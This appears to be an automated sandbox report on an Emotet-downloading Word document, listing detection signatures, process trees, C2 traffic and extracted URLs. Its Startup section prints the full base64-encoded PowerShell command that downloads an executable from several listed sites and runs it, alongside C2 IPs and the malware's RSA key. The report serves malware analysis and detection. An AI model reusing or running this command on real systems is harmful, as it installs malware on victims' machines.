Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.W97M.DownLoader.4729.14228.5024

Overview

General Information

Sample Name:SecuriteInfo.com.W97M.DownLoader.4729.14228.5024 (renamed file extension from 5024 to doc)
Analysis ID:255714
MD5:f9b91fee08c01f6cbc69baac3afd1e06
SHA1:359e86979b15d729410850b99e749f8887cbe171
SHA256:55d4a00cac25d7c4b8a9313a5e777051554443c4dd24d9ef43299a6cfee82284

Most interesting Screenshot:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Yara detected Emotet Downloader
Changes security center settings (notifications, updates, antivirus, firewall)
Creates processes via WMI
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA with many randomly named variables
Drops PE files to the user root directory
Drops executables to the windows directory (C:\Windows) and starts them
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
PowerShell case anomaly found
Powershell drops PE file
Very long command line found
AV process strings found (often used to terminate AV products)
Allocates a big amount of memory (probably used for heap spraying)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w10x64
  • WINWORD.EXE (PID: 1772 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE' /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
  • powershell.exe (PID: 6116 cmdline: powersheLL -e JABSAFEAQQBJAFcAcwB2AHUAPQAnAEUAVwBGAEYARABtAGQAYwAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAGAARQBjAFUAUgBpAFQAWQBQAGAAUgBgAG8AVABvAGAAYwBvAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABDAEcASwBaAFIAZgBqAG4AIAA9ACAAJwA3ADAAMQAnADsAJABLAEEAQwBIAEsAcwB1AHQAPQAnAFgARABYAEkAWQBqAGoAZAAnADsAJABZAFMAUwBYAEgAbQBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEMARwBLAFoAUgBmAGoAbgArACcALgBlAHgAZQAnADsAJABQAFcAQQBCAE0AaABlAHYAPQAnAFcAQwBYAFcAUABuAGcAYwAnADsAJABPAFIATQBFAEYAeQBhAGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4AZQBUAC4AVwBlAGIAYwBMAEkARQBOAHQAOwAkAEgASQBQAFEAQgBqAHgAYQA9ACcAaAB0AHQAcAA6AC8ALwBqAGEAbQBiAGkAbgBvAC4AdQBzAC8AdAB2AC8ARABZAHMAUABiAC8AKgBoAHQAdABwADoALwAvAHcAdwB3AC4AawBhAHAAcABlAHQAaQBqAG4ALgBlAHUALwB3AHAALQBhAGQAbQBpAG4ALwB0ADUAVQB1AGoAeQB3AHoAOAA4AC8AKgBoAHQAdABwADoALwAvAGsAaQBsAGwAaQBuAGcAdwBvAHIAdABoAGwAYQBiAHMALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAG4AMwB0AHEANQB1ADEANgA4ADEAMwAyADUANAA5AC8AKgBoAHQAdABwADoALwAvAGsAZQB2AGkAbgBsAGUAeQAuAGMAbwBtAC8AbABvAGcAbwBuAC8ATABYAGsAVQBiAC8AKgBoAHQAdABwADoALwAvAG0AbwB2AGUAdwBpAHQAaABrAGUAdAB0AHkALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBIAEkAUwBPAG8AdABWAE8ARwAvACcALgAiAFMAUABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQATwBJAFEAUABCAHkAZAB4AD0AJwBHAE4ASABWAFUAaQBpAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAFgAVQBEAFMATABnAGEAdAAgAGkAbgAgACQASABJAFAAUQBCAGoAeABhACkAewB0AHIAeQB7ACQATwBSAE0ARQBGAHkAYQBrAC4AIgBkAG8AVwBOAGAATABPAGEAYABEAEYAaQBMAGUAIgAoACQAWABVAEQAUwBMAGcAYQB0ACwAIAAkAFkAUwBTAFgASABtAGoAcgApADsAJABEAEkATwBVAEMAcABoAHgAPQAnAFUAQQBPAEsAQwB2AG4AdQAnADsASQBmACAAKAAoAC4AKAAnAEcAZQB0AC0ASQAnACsAJwB0ACcAKwAnAGUAbQAnACkAIAAkAFkAUwBTAFgASABtAGoAcgApAC4AIgBMAGAARQBOAGcAdABoACIAIAAtAGcAZQAgADMANQA5ADMAMQApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAYwBgAFIARQBgAEEAVABlACIAKAAkAFkAUwBTAFgASABtAGoAcgApADsAJABaAFYAQgBYAE8AZwB5AGgAPQAnAEIASQBQAE8AQwByAGMAdQAnADsAYgByAGUAYQBrADsAJABUAEcAQQBJAEQAaQBpAHgAPQAnAFYASwBNAEkAWgBuAGQAbQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABDAEsAWgBPAEQAaABkAHcAPQAnAEYATABMAFQAQQBiAGYAYgAnAA== MD5: 95000560239032BC68B4C2FDFCDEF913)
    • conhost.exe (PID: 6140 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • 701.exe (PID: 64 cmdline: C:\Users\user\701.exe MD5: 230E89F02FDF32DEA29C530DB40D092C)
    • iprop.exe (PID: 5824 cmdline: C:\Windows\SysWOW64\kbdphags\iprop.exe MD5: 230E89F02FDF32DEA29C530DB40D092C)
  • svchost.exe (PID: 5812 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5640 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5796 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 1776 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 4236 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 3484 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 2516 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 2036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Emotet

{"RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txtPowerShell_Case_AnomalyDetects obfuscated PowerShell hacktoolsFlorian Roth
  • 0x23:$s1: PowerShell
  • 0xfd:$s1: powersheLL
  • 0xfa6:$s1: PowerShell
  • 0x23:$sr1: PowerShell
  • 0xfa6:$sr1: PowerShell
  • 0x23:$sn3: PowerShell
  • 0xfa6:$sn3: PowerShell
  • 0xff:$a1: wersheLL -e
C:\Users\user\Documents\20200802\PowerShell_transcript.980108.VjXix09U.20200802002202.txtJoeSecurity_EmotetDownloaderYara detected Emotet DownloaderJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000002.244517553.0000000002310000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000003.00000002.244529038.0000000002321000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000004.00000002.495986403.0000000002290000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
          00000004.00000002.496008047.00000000022A1000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_022A1DA6 CryptDecodeObjectEx,4_2_022A1DA6
            Source: C:\Users\user\701.exeCode function: 3_2_00401078 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,3_2_00401078
            Source: C:\Users\user\701.exeCode function: 3_2_00444717 lstrlenA,FindFirstFileA,FindClose,3_2_00444717
            Source: C:\Users\user\701.exeCode function: 3_2_004047C0 FindFirstFileA,FindNextFileA,FindClose,3_2_004047C0
            Source: C:\Users\user\701.exeCode function: 3_2_004028E0 FindFirstFileA,FindClose,3_2_004028E0
            Source: C:\Users\user\701.exeCode function: 3_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_004390BA
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_004390BA __EH_prolog3_GS,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,4_2_004390BA
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_00444717 lstrlenA,FindFirstFileA,FindClose,4_2_00444717
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_022A28B7 FindFirstFileW,FindNextFileW,FindClose,4_2_022A28B7
            Source: winword.exeMemory has grown: Private usage: 0MB later: 63MB
            Source: global trafficDNS query: name: jambino.us
            Source: global trafficTCP traffic: 192.168.2.4:49694 -> 67.20.112.81:80
            Source: global trafficTCP traffic: 192.168.2.4:49694 -> 67.20.112.81:80

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49701 -> 198.57.203.63:8080
            Source: global trafficTCP traffic: 192.168.2.4:49701 -> 198.57.203.63:8080
            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKCache-Control: no-cache, must-revalidatePragma: no-cacheContent-Type: application/octet-streamExpires: Sat, 01 Aug 2020 22:22:04 GMTLast-Modified: Sat, 01 Aug 2020 22:22:04 GMTServer: Microsoft-IIS/8.5X-Powered-By: PHP/7.3.4Set-Cookie: 5f25eb0ce80db=1596320524; expires=Sat, 01-Aug-2020 22:23:04 GMT; Max-Age=60; path=/Content-Disposition: attachment; filename="6crd30176090.exe"Content-Transfer-Encoding: binaryX-Powered-By: ASP.NETX-Powered-By-Plesk: PleskWinDate: Sat, 01 Aug 2020 22:22:04 GMTContent-Length: 945664Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 89 aa eb 58 cd cb 85 0b cd cb 85 0b cd cb 85 0b ea 0d e8 0b c7 cb 85 0b ea 0d fe 0b da cb 85 0b cd cb 84 0b d3 c9 85 0b d3 99 10 0b d7 cb 85 0b d3 99 06 0b 46 cb 85 0b d3 99 01 0b 66 cb 85 0b d3 99 11 0b cc cb 85 0b cd cb 12 0b cc cb 85 0b d3 99 14 0b cc cb 85 0b 52 69 63 68 cd cb 85 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 87 33 24 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 6a 0a 00 00 40 04 00 00 00 00 00 a1 54 05 00 00 10 00 00 00 80 0a 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 0e 00 00 04 00 00 10 a8 0e 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 30 0d 00 f0 00 00 00 00 80 0d 00 c3 4d 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 88 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 e4 3c 0d 00 f4 0b 00 00 00 70 0d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 93 68 0a 00 00 10 00 00 00 6a 0a 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 2d 02 00 00 80 0a 00 00 2e 02 00 00 6e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b0 7f 00 00 00 b0 0c 00 00 40 00 00 00 9c 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 9d 3f 00 00 00 30 0d 00 00 40 00 00 00 dc 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 69 64 61 74 00 00 19 03 00 00 00 70 0d 00 00 04 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c3 4d 01 00 00 80 0d 00 00 4e 01 00 00 20 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program can
            Source: global trafficHTTP traffic detected: GET /tv/DYsPb/ HTTP/1.1Host: jambino.usConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wp-admin/t5Uujywz88/ HTTP/1.1Host: www.kappetijn.euConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ HTTP/1.1Referer: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/Content-Type: multipart/form-data; boundary=---------------------------399627655407671User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.57.203.63:8080Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
            Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
            Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
            Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
            Source: global trafficHTTP traffic detected: GET /tv/DYsPb/ HTTP/1.1Host: jambino.usConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /wp-admin/t5Uujywz88/ HTTP/1.1Host: www.kappetijn.euConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: jambino.us
            Source: unknownHTTP traffic detected: POST /gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/ HTTP/1.1Referer: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlKFlt/Content-Type: multipart/form-data; boundary=---------------------------399627655407671User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.57.203.63:8080Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 01 Aug 2020 22:22:04 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=75Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
            Source: iprop.exe, 00000004.00000003.320371317.000000000297E000.00000004.00000001.sdmpString found in binary or memory: http://187.64.128.197/tbRzD4ni/nXuiamtQ/R0HIm/LLkfv4Js4/nAwRPKJSXbvrF4/
            Source: iprop.exe, 00000004.00000002.497725026.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZFvsNlK
            Source: iprop.exe, 00000004.00000002.497725026.0000000002980000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63:8080/gwcWPTWxSZz/j4Z2/uVW2BO5nfoqC/wS8I0XPBqHOPJhmC/gTNIEAe1GDgUJCgo/WLJ70sIbZF
            Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.drString found in binary or memory: http://jambino.us/tv/DYsPb/
            Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.drString found in binary or memory: http://kevinley.com/logon/LXkUb/
            Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.drString found in binary or memory: http://killingworthlabs.com/wp-admin/n3tq5u168132549/
            Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.drString found in binary or memory: http://movewithketty.com/cgi-bin/HISOotVOG/
            Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: svchost.exe, 00000006.00000002.497559980.0000019443C3F000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: svchost.exe, 00000006.00000002.497807660.0000019443E10000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
            Source: svchost.exe, 00000008.00000002.303157438.000002679A213000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: PowerShell_transcript.980108.VjXix09U.20200802002202.txt.1.drString found in binary or memory: http://www.kappetijn.eu/wp-admin/t5Uujywz88/
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000008.00000003.302718278.000002679A241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000008.00000003.302718278.000002679A241000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000008.00000002.303265978.000002679A25C000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmp, svchost.exe, 00000008.00000003.302687033.000002679A25A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000008.00000003.302674922.000002679A260000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: iprop.exe, 00000004.00000003.320399798.0000000002994000.00000004.00000001.sdmpString found in binary or memory: https://fs.microsoft.ck
            Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000008.00000002.303215167.000002679A23D000.00000004.00000001.sdmp, svchost.exe, 00000008.00000002.303157438.000002679A213000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000008.00000003.302711074.000002679A245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000008.00000003.302711074.000002679A245000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000008.00000003.281020141.000002679A232000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000008.00000003.302654881.000002679A24A000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: svchost.exe, 00000006.00000002.497479948.0000019443C14000.00000004.00000001.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: C:\Users\user\701.exeCode function: 3_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,3_2_0041E3E9
            Source: C:\Users\user\701.exeCode function: 3_2_00450B9A __EH_prolog3,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetParent,SendMessageA,_memset,ScreenToClient,_memset,GetCursorPos,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SetWindowPos,SendMessageA,_memset,SendMessageA,GetParent,3_2_00450B9A
            Source: C:\Users\user\701.exeCode function: 3_2_00424D66 SendMessageA,UpdateWindow,GetKeyState,GetKeyState,GetKeyState,GetParent,PostMessageA,3_2_00424D66
            Source: C:\Users\user\701.exeCode function: 3_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_0044716C
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_0044716C ScreenToClient,_memset,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,4_2_0044716C
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_0041E3E9 GetKeyState,GetKeyState,GetKeyState,GetKeyState,4_2_0041E3E9
            Source: C:\Windows\SysWOW64\kbdphags\iprop.exeCode function: 4_2_00447984 GetKeyState,GetKeyState,GetKeyState,4_2_00447984
